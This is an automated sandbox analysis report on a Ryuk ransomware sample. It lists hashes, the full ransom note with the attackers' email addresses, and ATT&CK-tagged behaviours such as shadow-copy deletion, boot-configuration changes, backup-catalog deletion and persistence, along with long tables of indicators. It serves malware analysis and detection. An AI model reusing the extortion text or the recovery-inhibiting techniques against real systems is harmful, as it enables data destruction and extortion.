ryuk | 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

Resubmissions

21-09-2022 20:38

220921-ze6ayshae5 10

21-09-2022 20:33

220921-zbzzrscfcl 10

Analysis

max time kernel
151s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
21-09-2022 20:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ryuk.exe
Size

885KB
MD5

35194c73ff38dd6c3bed7c0efcff6826
SHA1

1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256

5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512

cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f
SSDEEP

12288:CXrZ7kwy8U9JlpYqWYgeWYg955/155/0QebUlAAs7sKSAoSRn6X:C97ktflKgQKUKR7sKSAhN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Recoverfile@aol.com or Recoverfile1@aol.com You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

Recoverfile@aol.com

Recoverfile1@aol.com

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4276 bcdedit.exe
3784 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1424 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation cmd.exe

pid	process
4276	bcdedit.exe
3784	bcdedit.exe

pid	process
1424	wbadmin.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 3 IoCs

Processes:

attrib.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

4244 icacls.exe

pid	process
4244	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ryuk.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\G:	ryuk.exe
File opened (read-only)	\??\I:	ryuk.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\M:	ryuk.exe
File opened (read-only)	\??\N:	ryuk.exe
File opened (read-only)	\??\P:	ryuk.exe
File opened (read-only)	\??\S:	ryuk.exe
File opened (read-only)	\??\U:	ryuk.exe
File opened (read-only)	\??\V:	ryuk.exe
File opened (read-only)	\??\A:	ryuk.exe
File opened (read-only)	\??\W:	ryuk.exe
File opened (read-only)	\??\Z:	ryuk.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\E:	ryuk.exe
File opened (read-only)	\??\J:	ryuk.exe
File opened (read-only)	\??\H:	ryuk.exe
File opened (read-only)	\??\L:	ryuk.exe
File opened (read-only)	\??\O:	ryuk.exe
File opened (read-only)	\??\X:	ryuk.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\B:	ryuk.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\F:	ryuk.exe
File opened (read-only)	\??\Q:	ryuk.exe
File opened (read-only)	\??\T:	ryuk.exe
File opened (read-only)	\??\Y:	ryuk.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\K:	ryuk.exe
File opened (read-only)	\??\R:	ryuk.exe

Drops file in Program Files directory 64 IoCs

Processes:

ryuk.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_KMS_Client-ul.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-ul-phn.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\COPYRIGHT.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\GroupLimit.M2TS.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-phn.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\PREVIEW.GIF.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\selector.js.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow Orange.xml.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Content.DATA.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\ui-strings.js.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest-ul-oob.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Grace-ppd.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f2\FA000000002.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\ui-strings.js.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\classlist.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-pl.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\office.x-none.msi.16.x-none.vreg.dat.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_OEM_Perp-ul-oob.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SQLENGINEMESSAGES.XML.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\ui-strings.js.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\jquery.ui.touch-punch.js.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Grace-ppd.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-pl.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\illustrations.png.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSYUBIN7.DLL.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_unselected_18.svg.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\ui-strings.js.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\close.svg.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kab.txt.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\STSLIST.DLL.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\AppStore_icon.svg.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\AppStore_icon.svg.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\et.pak.DATA.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_Subscription-ppd.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ul-oob.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_school.png.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-100.png.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL102.XML.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxSelected.svg.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\ui-strings.js.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ppd.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Grace-ul-oob.xrm-ms.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\AssetLibrary.ico.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\ui-strings.js.[Recoverfile@aol.com].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js.[Recoverfile@aol.com].RYK	ryuk.exe

Drops file in Windows directory 5 IoCs

Processes:

ryuk.exewbadmin.exe

description	ioc	process
File created	C:\Windows\RyukReadMe.txt	ryuk.exe
File created	C:\Windows\hrmlog1	ryuk.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3760 sc.exe
4568 sc.exe
1716 sc.exe
2904 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3708 schtasks.exe
3600 schtasks.exe
2140 schtasks.exe
3292 schtasks.exe

pid	process
3760	sc.exe
4568	sc.exe
1716	sc.exe
2904	sc.exe

pid	process
3708	schtasks.exe
3600	schtasks.exe
2140	schtasks.exe
3292	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
1908	vssadmin.exe
860	vssadmin.exe
1780	vssadmin.exe
4056	vssadmin.exe
3212	vssadmin.exe
3312	vssadmin.exe
3132	vssadmin.exe
4616	vssadmin.exe
3392	vssadmin.exe
4664	vssadmin.exe
1016	vssadmin.exe
4840	vssadmin.exe
4904	vssadmin.exe
1388	vssadmin.exe
1704	vssadmin.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3060 taskkill.exe
3940 taskkill.exe
4460 taskkill.exe
3560 taskkill.exe
1500 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings cmd.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

5008 NOTEPAD.EXE
Runs net.exe

pid	process
3060	taskkill.exe
3940	taskkill.exe
4460	taskkill.exe
3560	taskkill.exe
1500	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	cmd.exe

pid	process
5008	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ryuk.exe

pid	process
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe
1352	ryuk.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

Processes:

taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3060	taskkill.exe
Token: SeDebugPrivilege	3940	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1796	WMIC.exe
Token: SeSecurityPrivilege	1796	WMIC.exe
Token: SeTakeOwnershipPrivilege	1796	WMIC.exe
Token: SeLoadDriverPrivilege	1796	WMIC.exe
Token: SeSystemProfilePrivilege	1796	WMIC.exe
Token: SeSystemtimePrivilege	1796	WMIC.exe
Token: SeProfSingleProcessPrivilege	1796	WMIC.exe
Token: SeIncBasePriorityPrivilege	1796	WMIC.exe
Token: SeCreatePagefilePrivilege	1796	WMIC.exe
Token: SeBackupPrivilege	1796	WMIC.exe
Token: SeRestorePrivilege	1796	WMIC.exe
Token: SeShutdownPrivilege	1796	WMIC.exe
Token: SeDebugPrivilege	1796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1796	WMIC.exe
Token: SeRemoteShutdownPrivilege	1796	WMIC.exe
Token: SeUndockPrivilege	1796	WMIC.exe
Token: SeManageVolumePrivilege	1796	WMIC.exe
Token: 33	1796	WMIC.exe
Token: 34	1796	WMIC.exe
Token: 35	1796	WMIC.exe
Token: 36	1796	WMIC.exe
Token: SeBackupPrivilege	3544	vssvc.exe
Token: SeRestorePrivilege	3544	vssvc.exe
Token: SeAuditPrivilege	3544	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1796	WMIC.exe
Token: SeSecurityPrivilege	1796	WMIC.exe
Token: SeTakeOwnershipPrivilege	1796	WMIC.exe
Token: SeLoadDriverPrivilege	1796	WMIC.exe
Token: SeSystemProfilePrivilege	1796	WMIC.exe
Token: SeSystemtimePrivilege	1796	WMIC.exe
Token: SeProfSingleProcessPrivilege	1796	WMIC.exe
Token: SeIncBasePriorityPrivilege	1796	WMIC.exe
Token: SeCreatePagefilePrivilege	1796	WMIC.exe
Token: SeBackupPrivilege	1796	WMIC.exe
Token: SeRestorePrivilege	1796	WMIC.exe
Token: SeShutdownPrivilege	1796	WMIC.exe
Token: SeDebugPrivilege	1796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1796	WMIC.exe
Token: SeRemoteShutdownPrivilege	1796	WMIC.exe
Token: SeUndockPrivilege	1796	WMIC.exe
Token: SeManageVolumePrivilege	1796	WMIC.exe
Token: 33	1796	WMIC.exe
Token: 34	1796	WMIC.exe
Token: 35	1796	WMIC.exe
Token: 36	1796	WMIC.exe
Token: SeDebugPrivilege	4460	taskkill.exe
Token: SeDebugPrivilege	3560	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ryuk.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1352 wrote to memory of 2920	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 2920	1352	ryuk.exe	cmd.exe
PID 2920 wrote to memory of 3600	2920	cmd.exe	schtasks.exe
PID 2920 wrote to memory of 3600	2920	cmd.exe	schtasks.exe
PID 1352 wrote to memory of 2040	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 2040	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 3040	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 3040	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 2540	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 2540	1352	ryuk.exe	cmd.exe
PID 2540 wrote to memory of 2140	2540	cmd.exe	schtasks.exe
PID 2540 wrote to memory of 2140	2540	cmd.exe	schtasks.exe
PID 1352 wrote to memory of 4208	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 4208	1352	ryuk.exe	cmd.exe
PID 4208 wrote to memory of 4964	4208	cmd.exe	attrib.exe
PID 4208 wrote to memory of 4964	4208	cmd.exe	attrib.exe
PID 1352 wrote to memory of 4896	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 4896	1352	ryuk.exe	cmd.exe
PID 4896 wrote to memory of 3292	4896	cmd.exe	schtasks.exe
PID 4896 wrote to memory of 3292	4896	cmd.exe	schtasks.exe
PID 1352 wrote to memory of 4860	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 4860	1352	ryuk.exe	cmd.exe
PID 4860 wrote to memory of 3708	4860	cmd.exe	schtasks.exe
PID 4860 wrote to memory of 3708	4860	cmd.exe	schtasks.exe
PID 1352 wrote to memory of 2708	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 2708	1352	ryuk.exe	cmd.exe
PID 2708 wrote to memory of 5060	2708	cmd.exe	attrib.exe
PID 2708 wrote to memory of 5060	2708	cmd.exe	attrib.exe
PID 1352 wrote to memory of 4392	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 4392	1352	ryuk.exe	cmd.exe
PID 4392 wrote to memory of 3476	4392	cmd.exe	attrib.exe
PID 4392 wrote to memory of 3476	4392	cmd.exe	attrib.exe
PID 1352 wrote to memory of 4992	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 4992	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 1984	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 1984	1352	ryuk.exe	cmd.exe
PID 4992 wrote to memory of 1712	4992	cmd.exe	cmd.exe
PID 4992 wrote to memory of 1712	4992	cmd.exe	cmd.exe
PID 1984 wrote to memory of 1828	1984	cmd.exe	reg.exe
PID 1984 wrote to memory of 1828	1984	cmd.exe	reg.exe
PID 1352 wrote to memory of 2084	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 2084	1352	ryuk.exe	cmd.exe
PID 2084 wrote to memory of 4240	2084	cmd.exe	cmd.exe
PID 2084 wrote to memory of 4240	2084	cmd.exe	cmd.exe
PID 2084 wrote to memory of 3060	2084	cmd.exe	taskkill.exe
PID 2084 wrote to memory of 3060	2084	cmd.exe	taskkill.exe
PID 1352 wrote to memory of 3752	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 3752	1352	ryuk.exe	cmd.exe
PID 1712 wrote to memory of 4244	1712	cmd.exe	icacls.exe
PID 1712 wrote to memory of 4244	1712	cmd.exe	icacls.exe
PID 1352 wrote to memory of 4088	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 4088	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 3148	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 3148	1352	ryuk.exe	cmd.exe
PID 4240 wrote to memory of 3940	4240	cmd.exe	taskkill.exe
PID 4240 wrote to memory of 3940	4240	cmd.exe	taskkill.exe
PID 1352 wrote to memory of 2056	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 2056	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 2008	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 2008	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 3592	1352	ryuk.exe	cmd.exe
PID 1352 wrote to memory of 3592	1352	ryuk.exe	cmd.exe
PID 3592 wrote to memory of 3540	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 3540	3592	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

5060 attrib.exe
3476 attrib.exe
4076 attrib.exe
3696 attrib.exe
4964 attrib.exe

pid	process
5060	attrib.exe
3476	attrib.exe
4076	attrib.exe
3696	attrib.exe
4964	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"
1⤵
